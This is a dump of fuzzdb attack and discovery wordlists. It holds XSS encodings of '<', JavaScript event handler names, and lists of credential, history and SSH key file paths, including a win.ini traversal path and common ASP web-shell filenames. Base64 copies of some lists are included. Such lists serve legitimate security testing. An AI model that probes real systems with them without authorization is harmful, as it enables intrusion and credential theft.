/Manipulations/Manipulations/fuzzdb/attack/xss/all-encodings-of-lt.txt:
--------------------------------------------------------------------------------
1 | <
2 | %3C
3 | <
4 | <
5 | <
6 | <
7 | <
8 | <
9 | <
10 | <
11 | <
12 | <
13 | <
14 | <
15 | <
16 | <
17 | <
18 | <
19 | <
20 | <
21 | <
22 | <
23 | <
24 | <
25 | <
26 | <
27 | <
28 | <
29 | <
30 | <
31 | <
32 | <
33 | <
34 | <
35 | <
36 | <
37 | <
38 | <
39 | <
40 | <
41 | <
42 | <
43 | <
44 | <
45 | <
46 | <
47 | <
48 | <
49 | <
50 | <
51 | <
52 | <
53 | <
54 | <
55 | <
56 | <
57 | <
58 | <
59 | <
60 | <
61 | <
62 | <
63 | <
64 | <
65 | <
66 | <
67 | \x3c
68 | \x3C
69 | \u003c
70 | \u003C
71 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/all-encodings-of-lt.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/default-javascript-event-attributes.txt:
--------------------------------------------------------------------------------
1 | onAbort
2 | onBlur
3 | onChange
4 | onClick
5 | onDblClick
6 | onDragDrop
7 | onError
8 | onFocus
9 | onKeyDown
10 | onKeyPress
11 | onKeyUp
12 | onLoad
13 | onMouseDown
14 | onMouseMove
15 | onMouseOut
16 | onMouseOver
17 | onMouseUp
18 | onMove
19 | onReset
20 | onResize
21 | onSelect
22 | onSubmit
23 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/default-javascript-event-attributes.txt.base64:
--------------------------------------------------------------------------------
1 | b25BYm9ydA0Kb25CbHVyDQpvbkNoYW5nZQ0Kb25DbGljaw0Kb25EYmxDbGljaw0Kb25EcmFnRHJvcA0Kb25FcnJvcg0Kb25Gb2N1cw0Kb25LZXlEb3duDQpvbktleVByZXNzDQpvbktleVVwDQpvbkxvYWQNCm9uTW91c2VEb3duDQpvbk1vdXNlTW92ZQ0Kb25Nb3VzZU91dA0Kb25Nb3VzZU92ZXINCm9uTW91c2VVcA0Kb25Nb3ZlDQpvblJlc2V0DQpvblJlc2l6ZQ0Kb25TZWxlY3QNCm9uU3VibWl0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/test.xxe:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/Randomfiles.txt:
--------------------------------------------------------------------------------
1 | /accounts.txt
2 | /culeadora.txt
3 | /data.txt
4 | /database.txt
5 | /grabbed.html
6 | /info.txt
7 | /l0gs.txt
8 | /log.txt
9 | /logins.txt
10 | /logs.txt
11 | /members.txt
12 | /pass.txt
13 | /passes.txt
14 | /password.html
15 | /password.txt
16 | /passwords.html
17 | /passwords.txt
18 | /pazz.txt
19 | /pazzezs.txt
20 | /pw.txt
21 | /pws.txt
22 | /technico.txt
23 | /usernames.txt
24 | /users.txt
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/Randomfiles.txt.base64:
--------------------------------------------------------------------------------
1 | L2FjY291bnRzLnR4dA0KL2N1bGVhZG9yYS50eHQNCi9kYXRhLnR4dA0KL2RhdGFiYXNlLnR4dA0KL2dyYWJiZWQuaHRtbA0KL2luZm8udHh0DQovbDBncy50eHQNCi9sb2cudHh0DQovbG9naW5zLnR4dA0KL2xvZ3MudHh0DQovbWVtYmVycy50eHQNCi9wYXNzLnR4dA0KL3Bhc3Nlcy50eHQNCi9wYXNzd29yZC5odG1sDQovcGFzc3dvcmQudHh0DQovcGFzc3dvcmRzLmh0bWwNCi9wYXNzd29yZHMudHh0DQovcGF6ei50eHQNCi9wYXp6ZXpzLnR4dA0KL3B3LnR4dA0KL3B3cy50eHQNCi90ZWNobmljby50eHQNCi91c2VybmFtZXMudHh0DQovdXNlcnMudHh0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/UnixDotfiles.txt:
--------------------------------------------------------------------------------
1 | /.DS_Store
2 | /.FBCIndex
3 | /.access
4 | /.addressbook
5 | /.bash_history
6 | /.bashrc
7 | /.cobalt
8 | /.cobalt/alert/service.cgi?service=
9 | /.cobalt/alert/service.cgi?service=
10 | /.cobalt/sysManage/../admin/.htaccess
11 | /.fhp
12 | /.forward
13 | /.history
14 | /.htaccess
15 | /.htaccess.old
16 | /.htaccess.save
17 | /.htaccess~
18 | /.htpasswd
19 | /.lynx_cookies
20 | /.mysql_history
21 | /.nsconfig
22 | /.nsf/../winnt/win.ini
23 | /.passwd
24 | /.perf
25 | /.pinerc
26 | /.plan
27 | /.proclog
28 | /.procmailrc
29 | /.profile
30 | /.psql_history
31 | /.rhosts
32 | /.sh_history
33 | /.ssh
34 | /.ssh/authorized_keys
35 | /.ssh/known_hosts
36 | /.www_acl
37 | /.wwwacl
38 | /.access
39 | /.cobalt
40 | /.cobalt/alert/service.cgi?service=
41 | /.cobalt/alert/service.cgi?service=
42 | /.fhp
43 | /.htaccess
44 | /.htaccess.old
45 | /.htaccess.save
46 | /.htaccess~
47 | /.htpasswd
48 | /.nsconfig
49 | /.passwd
50 | /.www_acl
51 | /.wwwacl
52 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt:
--------------------------------------------------------------------------------
1 | 3fexe.asp
2 | ASpy.asp
3 | EFSO.asp
4 | RemExp.asp
5 | aspxSH.asp
6 | aspxshell.aspx
7 | aspydrv.asp
8 | cmd.asp
9 | cmd.aspx
10 | cmdexec.aspx
11 | elmaliseker.asp
12 | filesystembrowser.aspx
13 | fileupload.aspx
14 | ntdaddy.asp
15 | spexec.aspx
16 | sql.aspx
17 | tool.asp
18 | tool.aspx
19 | toolaspshell.asp
20 | up.asp
21 | up.aspx
22 | zehir.asp
23 | zehir.aspx
24 | zehir4.asp
25 | zehir4.aspx
26 | cmd-asp-5.1.asp
27 | cmdasp.asp
28 | cmdasp.aspx
29 | list.asp
30 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt.base64:
--------------------------------------------------------------------------------
1 | M2ZleGUuYXNwDQpBU3B5LmFzcA0KRUZTTy5hc3ANClJlbUV4cC5hc3ANCmFzcHhTSC5hc3ANCmFzcHhzaGVsbC5hc3B4DQphc3B5ZHJ2LmFzcA0KY21kLmFzcA0KY21kLmFzcHgNCmNtZGV4ZWMuYXNweA0KZWxtYWxpc2VrZXIuYXNwDQpmaWxlc3lzdGVtYnJvd3Nlci5hc3B4DQpmaWxldXBsb2FkLmFzcHgNCm50ZGFkZHkuYXNwDQpzcGV4ZWMuYXNweA0Kc3FsLmFzcHgNCnRvb2wuYXNwDQp0b29sLmFzcHgNCnRvb2xhc3BzaGVsbC5hc3ANCnVwLmFzcA0KdXAuYXNweA0KemVoaXIuYXNwDQp6ZWhpci5hc3B4DQp6ZWhpcjQuYXNwDQp6ZWhpcjQuYXNweA0KY21kLWFzcC01LjEuYXNwDQpjbWRhc3AuYXNwDQpjbWRhc3AuYXNweA0KbGlzdC5hc3ANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt:
--------------------------------------------------------------------------------
1 | post-query
2 | Config1.htm
3 | My_eGallery/public/displayCategory.php
4 | servlet/custMsg?guestName=